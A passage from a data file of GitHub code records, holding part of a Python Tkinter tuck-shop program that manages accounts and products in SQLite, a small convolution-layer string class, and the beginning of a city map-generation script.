Grid.columnconfigure(self.main_frame, 2, weight=1)\n\n self.title_var.set(\"{} - {}\".format(table.capitalize(), action_))\n\n def time_period_frame_setter(frame, entry, coder, *vars_, delete=False):\n \"\"\"adds necessary buttons, entries and labels for time bound details such as an offer\"\"\"\n\n def btn_1_click():\n btn_1.grid_forget(),\n btn_2.grid(row=0, column=1, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=E + W),\n btn_3.grid(row=0, column=2, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=E + W),\n btn_4.grid(row=0, column=3, padx=padx, pady=pady, ipadx=ipadx, ipady=ipady, sticky=E + W),\n Grid.columnconfigure(frame, 2, weight=1), Grid.columnconfigure(frame, 3, weight=1)\n\n def btn_2_click():\n time_codes[coder].set(1), btn_2.destroy(), btn_3.destroy(), btn_4.destroy(),\n entry.grid(row=0, column=1, padx=(padx, 0), sticky=E),\n [Grid.columnconfigure(frame, k, weight=0) for k in range(1, 4)],\n Grid.columnconfigure(frame, 2, weight=1),\n Label(frame, text='to be applied indefinitely', font=font2,\n bg=lbls_colour).grid(row=0, column=2, sticky=W),\n btn_1.grid(row=0, column=3, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W),\n btn_1.config(text='DELETE', 
width=int(width / 3), bg='red',\n command=lambda: self.combine_funcs(\n [widget.grid_forget() for widget in frame.winfo_children()[2:]],\n frame.winfo_children()[0].grid_forget(), # this is the frame inside of 'frame'\n [Grid.columnconfigure(frame, k + 1, weight=0) for k in range(3)],\n time_period_frame_setter(frame, entry, coder, *vars_, delete=True)))\n\n def btn_3_click():\n date_entry = Frame(frame, bg=frames_colour, height=35, width=130)\n time_codes[coder].set(2), btn_2.destroy(), btn_3.destroy(), btn_4.destroy(),\n entry.grid(row=0, column=1, padx=(padx, 0), sticky=E),\n [Grid.columnconfigure(frame, k, weight=0) for k in range(1, 4)],\n Grid.columnconfigure(frame, 4, weight=1),\n Label(frame, text='until', font=font2, bg=lbls_colour).grid(row=0, column=2, padx=0),\n date_entry.grid(row=0, column=3), date_entry.grid_propagate(False),\n\n date_picker.Datepicker(date_entry, datevar=vars_[0], font=font2, entrywidth=10,\n entrystyle=\"EntryStyle.TEntry\").grid(row=0, column=0, padx=2),\n btn_1.grid(row=0, column=4, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E),\n btn_1.config(text='DELETE', width=int(width / 3), bg='red',\n command=lambda: self.combine_funcs(\n [widget.grid_forget() for widget in frame.winfo_children()[2:]],\n frame.winfo_children()[0].grid_forget(), # this is the frame inside of 'frame'\n [Grid.columnconfigure(frame, k + 1, weight=0) for k in range(1, 5)],\n time_period_frame_setter(frame, entry, coder, *vars_, delete=True)))\n\n def btn_4_click():\n vars_[1].set(\"week(s)\")\n opt_menu = OptionMenu(frame, vars_[1], \"purchase(s)\", \"hour(s)\", \"day(s)\", \"week(s)\", \"month(s)\",\n \"year(s)\")\n opt_menu.config(font=font2, bg=entries_colour)\n opt_menu.nametowidget(opt_menu.menuname).configure(font=font2, bg=entries_colour)\n time_codes[coder].set(3), btn_2.destroy(), btn_3.destroy(), btn_4.destroy(),\n entry.grid(row=0, column=1, padx=(padx, 0), sticky=E),\n [Grid.columnconfigure(frame, k, weight=0) for k in range(1, 4)],\n Grid.columnconfigure(frame, 5, weight=1),\n Label(frame, text='for', font=font2, bg=lbls_colour).grid(row=0, column=2),\n Entry(frame, font=font2, bg=entries_colour, width=int(width / 3), textvariable=vars_[0])\\\n .grid(row=0, column=3, pady=pady * 3, sticky=N + S),\n opt_menu.grid(row=0, column=4),\n btn_1.grid(row=0, column=5, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E),\n btn_1.config(text='DELETE', width=int(width / 3), bg='red',\n command=lambda: self.combine_funcs(\n [widget.grid_forget() for widget in frame.winfo_children()[2:]],\n frame.winfo_children()[0].grid_forget(), # this is the frame inside of\n # 'frame'\n [Grid.columnconfigure(frame, k + 1, weight=0) for k in range(1, 6)],\n time_period_frame_setter(frame, entry, coder, *vars_, delete=True)))\n\n btn_1 = Button(frame, text='Add', font=font2, bg=btns_colour, command=lambda: btn_1_click())\n btn_1.grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frame, 1, weight=1)\n\n btn_2 = Button(frame, text='INDEFINITELY', font=font2, width=width, bg=btns_colour,\n command=lambda: btn_2_click())\n\n btn_3 = Button(frame, text='UNTIL GIVEN DATE', font=font2, width=width, bg=btns_colour,\n command=lambda: btn_3_click())\n\n btn_4 = Button(frame, text='FOR GIVEN TIME', width=width, wraplength=230, font=font2, bg=btns_colour,\n command=lambda: btn_4_click())\n\n if info is not None and not delete:\n btn_1_click() if time_codes[coder].get() != 0 else None\n btn_2_click() if time_codes[coder].get() == 1 else 
btn_3_click() if time_codes[coder].get() == 2 \\\n else btn_4_click() if time_codes[coder].get() == 3 else None\n\n font1, font2 = (\"Calibri\", \"18\", \"bold\"), (\"Calibri\", \"18\")\n ipadx, ipady, padx, pady, width = 10, 8, 20, 5, 18\n lbl_titles_colour, entries_colour, lbls_colour, btns_colour, frames_colour = 'grey70', 'grey70', 'grey70', \\\n 'green3', 'grey70'\n lbl, data, var, time_codes, i = list(), list(), list(), list(), int()\n [time_codes.append(IntVar()) for _ in range(3)]\n [var.append(StringVar()) for _ in range(len(self.get_columns(table)[1:-1]) - len(time_codes))]\n\n if info is not None:\n if table == \"accounts\":\n i_ = 1\n for j in range(1, len(var) + len(time_codes) + 1):\n column_name = self.get_columns(table)[j]\n if column_name in ['discount_1', 'spending_limit_1', 'sub_zero_allowance_1']:\n time_codes[i_ - 1].set(info[j])\n i_ += 1\n else:\n if column_name in ['f_name', 'l_name']:\n var[j - i_].set(info[j])\n elif column_name in ['budget', 'discount_3', 'spending_limit_2', 'sub_zero_allowance_2']:\n try:\n var[j - i_].set(\"{:.2f}\".format(float(info[j])))\n except ValueError: # in case of empty string (can't float nothing)\n var[j - i_].set(\"{:.2f}\".format(float()))\n elif column_name == 'discount_2':\n var[j - i_].set(info[j] if info[j] in ['£', '%'] else '%')\n else:\n var[j - i_].set(info[j])\n else: # table == \"products\"\n pass\n\n def is_number(string):\n \"\"\"checks if str can be converted to float\"\"\"\n try:\n float(string)\n return True\n except ValueError:\n return False\n\n if table == 'accounts': # populate form with relevant fields\n frames = list()\n for i in range(7): # create frames for form fields\n frames.append(Frame(center_frame, bg=frames_colour, height=60, width=400))\n frames[i].grid(row=i, column=0, columnspan=2, pady=pady, sticky=E + W)\n\n i += 1\n Label(frames[0], text='First Name', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[0], textvariable=var[0], font=font2, width=width*3, bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[0], 1, weight=1)\n\n Label(frames[1], text='Last Name', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[1], textvariable=var[1], font=font2, width=width*3, bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[1], 1, weight=1)\n\n def top_up_btn_set():\n \"\"\"sets the top up btn\"\"\" # used so that the top up btn can be reset once topped up\n top_up_btn = Button(\n frames[2], text='Top Up', font=font2, width=width*2, bg=btns_colour,\n command=lambda: self.combine_funcs(\n top_up_entry.grid(row=0, column=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady),\n top_up_btn.grid(row=0, column=3, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W),\n top_up_entry.focus(),\n top_up_btn.config(command=lambda: self.combine_funcs(\n var[2].set(\"£{:.2f}\".format(float(var[2].get()[1:]) + float(budget.get() if is_number(budget.get())\n else 0 if budget.get() != ''\n else 0))),\n top_up_btn.grid_forget(), top_up_btn_set(), budget.set('')))))\n top_up_btn.grid(row=0, column=2, columnspan=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady,\n sticky=E + W)\n\n Label(frames[2], text='Budget', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, 
column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n var[2].set('£0.00')\n Label(frames[2], textvariable=var[2], font=font2, width=int(width / 2), bg=lbls_colour, relief=RIDGE) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W)\n top_up_btn_set()\n Grid.columnconfigure(frames[2], 2, weight=1)\n budget = StringVar()\n top_up_entry = Entry(frames[2], textvariable=budget, font=font2, width=int(width / 2), bg=entries_colour)\n\n discount_frame = Frame(frames[3], bg=frames_colour)\n Label(frames[3], text='Discount', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n var[3].set(\"%\")\n opt_menu_1 = OptionMenu(discount_frame, var[3], \"%\", \"£\")\n opt_menu_1.config(font=font2, bg=entries_colour)\n opt_menu_1.nametowidget(opt_menu_1.menuname).configure(font=font2, bg=entries_colour)\n opt_menu_1.grid(row=0, column=0, pady=pady * 2, sticky=N + S)\n discount_amount = Entry(discount_frame, textvariable=var[4], font=font2, width=int(width / 3),\n bg=entries_colour)\n discount_amount.grid(row=0, column=1, pady=pady * 2, sticky=N + S)\n Grid.rowconfigure(discount_frame, 0, weight=1)\n time_period_frame_setter(frames[3], discount_frame, 0, var[5], var[6])\n\n spending_limit_frame = Frame(frames[4], bg=frames_colour)\n Label(frames[4], text='Spending Limit', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Grid.columnconfigure(spending_limit_frame, 1, weight=1)\n Label(spending_limit_frame, text='£', font=font2, bg=lbls_colour) \\\n .grid(row=0, column=0, pady=pady * 2, sticky=N + S)\n Entry(spending_limit_frame, textvariable=var[7], font=font2, width=int(width / 3), bg=entries_colour)\\\n .grid(row=0, column=1, pady=pady * 2, sticky=N + S)\n Label(spending_limit_frame, text='per', font=font2, bg=lbls_colour)\\\n .grid(row=0, column=2, pady=pady * 2, sticky=N + S)\n var[8].set(\"purchase\")\n opt_menu_3 = OptionMenu(spending_limit_frame, var[8], \"purchase\", \"day\", \"week\", \"month\")\n opt_menu_3.config(font=font2, bg=entries_colour)\n opt_menu_3.nametowidget(opt_menu_3.menuname).configure(font=font2, bg=entries_colour)\n opt_menu_3.grid(row=0, column=3, pady=pady * 2, sticky=N + S)\n Grid.rowconfigure(spending_limit_frame, 0, weight=1)\n time_period_frame_setter(frames[4], spending_limit_frame, 1, var[9], var[10])\n\n sub_zero_frame = Frame(frames[5], bg=frames_colour)\n Label(frames[5], text='Sub-Zero Allowance', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Label(sub_zero_frame, text='£', font=font2, bg=lbls_colour) \\\n .grid(row=0, column=0, pady=pady * 2, sticky=N + S)\n Entry(sub_zero_frame, textvariable=var[11], font=font2, width=int(width / 3), bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, pady=pady * 2, sticky=N + S)\n Grid.rowconfigure(sub_zero_frame, 0, weight=1)\n time_period_frame_setter(frames[5], sub_zero_frame, 2, var[12], var[13])\n\n Label(frames[6], text='Notes', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[6], textvariable=var[14], font=font2, width=int(width / 3), bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[6], 1, weight=1)\n\n else: # table == \"products\"\n frames = list()\n for i in range(5): # 
create frames for form fields\n frames.append(Frame(center_frame, bg=frames_colour, height=60, width=400))\n frames[i].grid(row=i, column=0, columnspan=2, pady=pady, sticky=E + W)\n\n i += 1\n Label(frames[0], text='Product Name', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[0], textvariable=var[0], font=font2, width=width * 3, bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[0], 1, weight=1)\n\n Label(frames[1], text='Cost Price', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n var[1].set('£0.00')\n Entry(frames[1], textvariable=var[1], font=font2, width=int(width / 2), bg=lbls_colour, relief=RIDGE) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W)\n\n def set_price_btn_set():\n \"\"\"sets the set price btn\"\"\" # used so that the set price btn can be reset once set up\n set_price_btn = Button(\n frames[2], text=\"Set Selling Price\" if info is None else \"Edit Selling Price\", font=font2,\n width=width*2, bg=btns_colour,\n command=lambda: self.combine_funcs(\n set_price_entry.grid(row=0, column=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady),\n set_price_btn.grid(row=0, column=3, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady,\n sticky=E + W),\n set_price_entry.focus(),\n set_price_btn.config(command=lambda: self.combine_funcs(\n var[2].set(\"£{:.2f}\".format(float(price.get() if is_number(price.get()) else 0\n if price.get() != '' else 0))),\n set_price_btn.grid_forget(), set_price_btn_set(), price.set('')))))\n set_price_btn.grid(row=0, column=2, columnspan=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady,\n sticky=E + W)\n\n def top_up_btn_set():\n \"\"\"sets the top up qty btn\"\"\" # used so that the top up btn can be reset once topped up\n top_up_btn = Button(\n frames[3], text='Top Up Qty', font=font2, width=width*2, bg=btns_colour,\n command=lambda: self.combine_funcs(\n set_qty_entry.grid(row=0, column=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady),\n top_up_btn.grid(row=0, column=3, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W),\n set_qty_entry.focus(),\n top_up_btn.config(command=lambda: self.combine_funcs(\n var[3].set(\"{}\".format(\n int(var[3].get()) +\n int(qty.get() if is_number(qty.get()) else 0 if qty.get() != '' else 0))),\n top_up_btn.grid_forget(), top_up_btn_set(), qty.set('')))))\n top_up_btn.grid(row=0, column=2, columnspan=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady,\n sticky=E + W)\n\n # !!--------------------- Should warn user if user attempts to save product and has clicked on set_selling_\n # price but not confirmed amount ---------------------!!\n Label(frames[2], text='Selling Price', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n var[2].set('£0.00')\n Label(frames[2], textvariable=var[2], font=font2, width=int(width / 2), bg=lbls_colour, relief=RIDGE) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W)\n set_price_btn_set()\n Grid.columnconfigure(frames[2], 2, weight=1)\n price = StringVar()\n set_price_entry = Entry(frames[2], textvariable=price, font=font2, width=int(width / 2), bg=entries_colour)\n\n Label(frames[3], text='Quantity', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, 
ipady=ipady, padx=padx, pady=pady)\n var[3].set('0')\n Label(frames[3], textvariable=var[3], font=font2, width=int(width / 2), bg=lbls_colour, relief=RIDGE) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W)\n top_up_btn_set()\n Grid.columnconfigure(frames[3], 2, weight=1)\n qty = StringVar()\n set_qty_entry = Entry(frames[3], textvariable=qty, font=font2, width=int(width / 2), bg=entries_colour)\n\n Label(frames[4], text='Notes', font=font1, width=width, bg=lbl_titles_colour) \\\n .grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady)\n Entry(frames[4], textvariable=var[4], font=font2, width=int(width / 3), bg=entries_colour) \\\n .grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n Grid.columnconfigure(frames[4], 1, weight=1)\n\n def curr_details(): # returns a list of all variables in order\n results = list()\n [results.append(item.get()) for item in var[:3]], results.append(time_codes[0].get()), \\\n [results.append(item.get()) for item in var[3:7]], results.append(time_codes[1].get()), \\\n [results.append(item.get()) for item in var[7:11]], results.append(time_codes[2].get()), \\\n [results.append(item.get()) for item in var[11:]]\n return results\n\n data_valid = BooleanVar()\n if info is not None: # edit\n def edit(): # for the sake of binding the enter key\n self.data_deleter(table, self.get_columns(table)[0], info[0])\n data_valid.set(self.data_appender(table, curr_details()))\n self.data_appender(table, [item for item in info[1:-1]]) if not data_valid.get() else caller(page_num)\n\n btn_frame = Frame(center_frame, bg='grey70')\n btn_frame.grid(row=i, column=0, columnspan=2, sticky=E + W)\n\n cancel_btn = Button(btn_frame, text=\"Cancel\", font=font1, bg=\"orange\", width=width,\n command=lambda: caller(page_num))\n cancel_btn.grid(row=0, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n\n save_btn = Button(btn_frame, text=\"Save\", font=font1, bg=\"orange\", width=width,\n command=lambda: edit())\n save_btn.grid(row=0, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n\n delete_btn = Button(btn_frame, text=\"Delete\", font=font1, bg=\"red\", width=width,\n command=lambda: self.combine_funcs(\n self.data_deleter(table, self.get_columns(table)[0], info[0]), caller(page_num)))\n delete_btn.grid(row=0, column=2, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n\n Grid.columnconfigure(btn_frame, 0, weight=1)\n Grid.columnconfigure(btn_frame, 1, weight=1)\n Grid.columnconfigure(btn_frame, 2, weight=1)\n\n self.delete.append(info[0])\n else: # add\n def add(): # for the sake of binding the enter key\n caller(page_num) if self.data_appender(table, curr_details()) else None\n\n cancel_btn = Button(center_frame, text=\"Cancel\", font=font1, bg=\"orange\", width=width,\n command=lambda: caller(page_num))\n cancel_btn.grid(row=i, column=0, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=E + W)\n\n add_btn = Button(center_frame, text=\"Add\", font=font1, bg=\"orange\", width=width,\n command=lambda: add())\n add_btn.grid(row=i, column=1, ipadx=ipadx, ipady=ipady, padx=padx, pady=pady, sticky=W + E)\n\n [time_codes[i].set(0) for i in range(3)]\n\n for i in range(len(self.get_columns(table)[1:-1]) + 1):\n Grid.rowconfigure(center_frame, i, weight=1)\n Grid.columnconfigure(center_frame, 0, weight=1)\n Grid.columnconfigure(center_frame, 1, weight=1)\n Grid.columnconfigure(center_frame, 2, weight=0)\n Grid.columnconfigure(center_frame, 3, 
weight=0)\n\n def get_columns(self, table):\n \"\"\"returns column names for given table\"\"\"\n connection, cursor = self.db_opener(\"tuck.db\")\n cursor.execute('SELECT * FROM {}'.format(table))\n columns = [description[0] for description in cursor.description]\n connection.close()\n return columns\n\n def data_deleter(self, table, column_name, item_id):\n \"\"\"deletes items from database using table name, column name and record value for given column\"\"\"\n connection, cursor = self.db_opener(\"tuck.db\")\n cursor.execute(\"\"\"DELETE FROM {} WHERE {} = ?;\"\"\".format(table, column_name), (item_id,))\n connection.commit()\n connection.close()\n\n def error_decoder(self, code):\n \"\"\"returns error message for given error code for user\"\"\"\n\n if code == 1:\n return \"missing first / last name\"\n elif code == 2:\n return \"invalid character used in name\"\n elif code == 3:\n return \"multiple decimal places used\"\n elif code == 4:\n return \"only numbers can be used (and optional single decimal place) - applies to 'budget', 'discount', \" \\\n \"'spending limit' and 'sub zero allowance'\"\n elif code == 5:\n return \"invalid date entered - please use the date helper by simply clicking on the date entry box\"\n elif code == 6:\n return \"date cannot have passed (or be today)\"\n elif code == 7:\n return \"number of weeks entered is not a valid number\"\n\n def data_appender(self, table, *args, silence=False):\n \"\"\"appends given data into database but first checks for validity including if item is duplicate\"\"\"\n items = self.table_reader(table)\n code, data = self.account_data_validator(args[0], table)\n\n if code != 0:\n if not silence:\n tkinter.messagebox.showerror(\"Data Validity Error\",\n \"There is a problem with the entered data.\"\n \"\\n\\nError Code: {}\\n\\nError Msg: {}\".format(code,\n self.error_decoder(code)))\n return False\n\n duplicate = False\n for item in items:\n if data[0] == item[1]:\n if table == 'accounts' and data[1] != item[2]:\n continue\n if not silence:\n tkinter.messagebox.showerror(\"Duplicate\",\n \"Entry already exists!\\n\\nPlease alter the name to continue.\")\n return False\n\n if not duplicate:\n num_of_vals = str()\n for _ in range(len(self.get_columns(table)) - 1):\n num_of_vals += '?, '\n num_of_vals = num_of_vals[:-2]\n\n values = list()\n [values.append(val) for val in data], values.append(datetime.datetime.now())\n\n connection, cursor = self.db_opener(\"tuck.db\")\n cursor.execute(\"INSERT INTO {} VALUES (NULL, {});\".format(table, num_of_vals), values)\n connection.commit()\n connection.close()\n\n return True\n\n def get_accounts(self):\n \"\"\"returns all accounts\"\"\"\n connection, cursor = self.db_opener(\"tuck.db\")\n cursor.execute(\"\"\"SELECT * FROM accounts ORDER BY l_name, f_name;\"\"\")\n accounts = cursor.fetchall()\n connection.close()\n return accounts\n\n def csv_reader(self, csv_address, depth=2):\n \"\"\"imports csv and breaks it up into a returned list\"\"\"\n\n try:\n with open(csv_address, 'r', encoding=\"UTF-8\") as file:\n file = file.read()\n csv = file.split('\\n')\n if depth == 2:\n for i in range(len(csv)):\n csv[i] = csv[i].split(',')\n csv = csv[:-1] if csv[-1][0] == '' else csv\n except FileNotFoundError:\n csv = ''\n\n return csv\n\n def account_data_validator(self, data, table):\n \"\"\"verifies validity of data; returns the input data\"\"\"\n # (or, if possible, amended input data) as well as a code to identify whether the data is valid or if there is\n # an error (and if so, what that error 
is)\n\n # ensures the right number of items are in the data array (used for importing)\n size = len(self.get_columns(table)[1:-1])\n if len(data) < 2:\n return False\n while len(data) > size:\n del data[-1]\n while len(data) < size:\n data.append('')\n\n code = 0\n until_date, for_time = bool(), bool()\n\n for i in range(len(data)):\n column_name = self.get_columns(table)[i + 1]\n\n if column_name in ['f_name', 'l_name']:\n data[i] = data[i].capitalize()\n if data[i] == '':\n code = 1 # missing first / last name\n for char in data[i]:\n if not (char.lower() in self.letters or char in self.numbers or char in '_- '):\n code = 2 # invalid char used in name\n\n if column_name in ['budget', 'discount_3', 'spending_limit_2', 'sub_zero_allowance_2']:\n if str(data[i]).count('.') > 1:\n code = 3 # multiple decimal places used\n for symbol in '£$%': # remove above symbols because numbers are stored without them\n data[i] = str(data[i]).replace(symbol, '')\n if data[i] == '': # if just left empty\n continue\n for char in data[i]:\n if not (char in self.numbers or char == '.'):\n code = 4 # only numbers can be used (and optional single decimal place)\n\n if column_name in ['discount_1', 'spending_limit_1', 'sub_zero_allowance_1']: # for locating invalid date\n # entries but only applies if the date time frame has been chosen\n if data[i] == 2:\n until_date = True\n if data[i] == 3:\n for_time = True\n\n if column_name in ['discount_4', 'spending_limit_4', 'sub_zero_allowance_3']:\n if until_date:\n until_date = False\n if not 10 <= len(data[i]) <= 10:\n code = 5 # invalid date\n continue\n try:\n datetime.datetime(int(data[i].split('-')[0]), int(data[i].split('-')[1]),\n int(data[i].split('-')[2]))\n except (ValueError, IndexError):\n code = 5 # invalid date\n if code != 5:\n if datetime.datetime(int(data[i].split('-')[0]), int(data[i].split('-')[1]),\n int(data[i].split('-')[2])) < datetime.datetime.now():\n code = 6 # date has passed (or is today)\n if for_time:\n try:\n data[i] = int(data[i])\n except ValueError:\n code = 7 # for x time ensures integer is used\n\n return code, data\n\n def importer(self, csv_address, table):\n \"\"\"imports data from external csv file to a local csv file\"\"\"\n\n try: # sort out if user cancels looking for csv address\n csv = self.csv_reader(csv_address)\n\n for i in range(len(csv)):\n csv[i][0] = csv[i][0].lower().capitalize()\n csv[i][1] = csv[i][1].lower().capitalize()\n\n for i in range(len(csv)): # send data for validation\n try:\n code, csv[i] = self.account_data_validator(csv[i], table)\n except IndexError:\n pass\n\n # remove invalid items such as empty or False items\n for _ in range(csv.count('')):\n csv.remove('')\n invalid_accounts = int()\n for _ in range(csv.count(False)):\n csv.remove(False)\n invalid_accounts += 1\n\n # imports into given account\n success = int()\n for item in csv:\n success += self.data_appender(table, item, silence=True)\n\n extra_msg = \"\\n\\nThe remaining {} were not imported either because they were duplicates or because the \" \\\n \"data is not in the appropriate order.\"\n tkinter.messagebox.showinfo(\"Import Results\",\n \"Out of all {} found row(s) in the csv {} were successfully imported.{}\".format(\n len(csv), success, extra_msg.format(len(csv) - success)\n if success < len(csv) else \"\"))\n\n except TypeError:\n pass\n\n def page_populator(self, frame, items, page, table, caller):\n \"\"\"populates the given frame with the given items up to a hardcoded limit for any given page\"\"\"\n\n for widget in 
frame.winfo_children():\n widget.destroy()\n\n offset = (page - 1) * self.page_items_width * self.page_items_height\n btn, i = dict(), int()\n\n for j in range(self.page_items_height):\n Grid.rowconfigure(frame, j, weight=1)\n for k in range(self.page_items_width):\n if j == 0:\n Grid.columnconfigure(frame, k, weight=1)\n try:\n btn[i] = Button(frame, text=\"{} {}\".format(items[i+offset][1], items[i+offset][2])\n if table == 'accounts' else \"{}\".format(items[i+offset][1]),\n font=(\"Calibri\", \"14\", \"bold\"), width=6, height=2,\n command=lambda item=items[i+offset]: self.item_form(1, page, table, caller, item)\n if caller != self.shop else caller(user=item))\n btn[i].grid(row=j, column=k, padx=15, pady=5, sticky=E+W)\n except IndexError:\n break\n i += 1\n\n def products(self, page_num=1):\n \"\"\"provides the appropriate data for the setup_window_generator to generate the products window (see the\n generator itself for functionality)\"\"\"\n\n [widget.destroy() for widget in self.main_frame.winfo_children()]\n\n self.setup_window_generator(page_num, 'products', self.item_form, self.table_reader, self.products)\n\n def table_reader(self, table, *orders):\n \"\"\"loads all items from given table into a dictionary using search and sort parameters when provided\"\"\"\n # it first files the list down according to any search terms, sorts them alphabetically according to given\n # columns and then returns them.\n # Function starts by building an SQL search query which must have it's syntax exact and then proceeds to execute\n # the query\n\n connection, cursor = self.db_opener(\"tuck.db\")\n sql_command, search, order_by = \"\"\"SELECT * FROM {};\"\"\".format(table), '', ''\n\n for char in self.search:\n search += char\n try:\n search = search[:-1] if search[-1] == ' ' else search\n except IndexError:\n pass\n\n for order in orders:\n if order is not None:\n order_by += '\\\"' + order + '\\\", '\n order_by = order_by[:-2]\n\n if search != '':\n sql_command = sql_command[:-1]\n sql_command += ' WHERE '\n\n for _ in range(search.count(' ') + 1):\n sql_command += '\\\"{}\\\" LIKE ? OR '.format('f_name' if table == 'accounts' else 'p_name')\n sql_command = sql_command + '\\\"l_name\\\" LIKE ? 
OR ' if table == 'accounts' else sql_command\n sql_command = sql_command[:-4] + ';'\n\n if order_by != '':\n sql_command = sql_command[:-1]\n sql_command += ' ORDER BY ' + order_by + ';'\n\n if search != '':\n search_ = ['%' + search.split(' ')[i] + '%' for i in range(search.count(' ') + 1)]\n search = [search_[i//2] for i in range(len(search_)*2)] if table == 'accounts' else search_\n\n # print('sql_command:', sql_command)\n # print('search', search)\n\n cursor.execute(sql_command, search)\n else:\n cursor.execute(sql_command)\n\n table = cursor.fetchall()\n connection.close()\n\n return table\n\n def combine_funcs(*funcs):\n \"\"\"enables multiple functions to be called serially inline\"\"\"\n\n def combined_func(*args, **kwargs):\n [f(*args, **kwargs) for f in funcs]\n\n return combined_func\n\n\n# help(TuckProgram)\nif __name__ == \"__main__\":\n start = TuckProgram()\n","repo_name":"danielsamet/Tuck-Program","sub_path":"OLD/tuckProgram.py","file_name":"tuckProgram.py","file_ext":"py","file_size_in_byte":76196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23164368735","text":"class Convolution:\n def __init__(self, filter_size=32, filter_shape=(3, 3), activation='relu', input_shape=None):\n self.filter_size = filter_size\n self.filter_shape = filter_shape\n self.activation = activation\n self.input_shape = input_shape\n\n @staticmethod\n def stringify_two_d(_input):\n return \"{}x{}\".format(_input[0], _input[1])\n\n @staticmethod\n def stringify_three_d(_input):\n return \"{}x{}x{}\".format(_input[0], _input[1], _input[2])\n\n def __str__(self):\n gen_str = \"conv::filter_size={},filter_shape={},activation={}\".format(\n self.filter_size,\n self.stringify_two_d(self.filter_shape),\n self.activation\n )\n if self.input_shape is not None:\n gen_str += \",input_shape={}\".format(self.stringify_three_d(self.input_shape))\n gen_str += \";\"\n return gen_str\n","repo_name":"khallaghi/denser","sub_path":"genetic_algorithm/convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15625143389","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8\n# *****************************************************************************#\n\nfrom __future__ import annotations\n\nfrom pathlib import Path\n\nfrom geopy.geocoders import Nominatim\n\nfrom add_text import add_city_name\nfrom generate_map import Map\nfrom palette import load_colour_palettes\n\nPLACES = [\n #{\"city\": \"Hong Kong\", \"radius\": 5000},\n #{\"city\": \"Bangkok\", \"radius\": 5000},\n #{\"city\": \"London\", \"radius\": 5000},\n #{\"city\": \"Macau\", \"radius\": 5000},\n #{\"city\": \"Singapore\", \"radius\": 5000},\n #{\"city\": \"Paris\", \"radius\": 5000},\n {\"city\": \"Dubai\", \"radius\": 5000},\n #{\"city\": 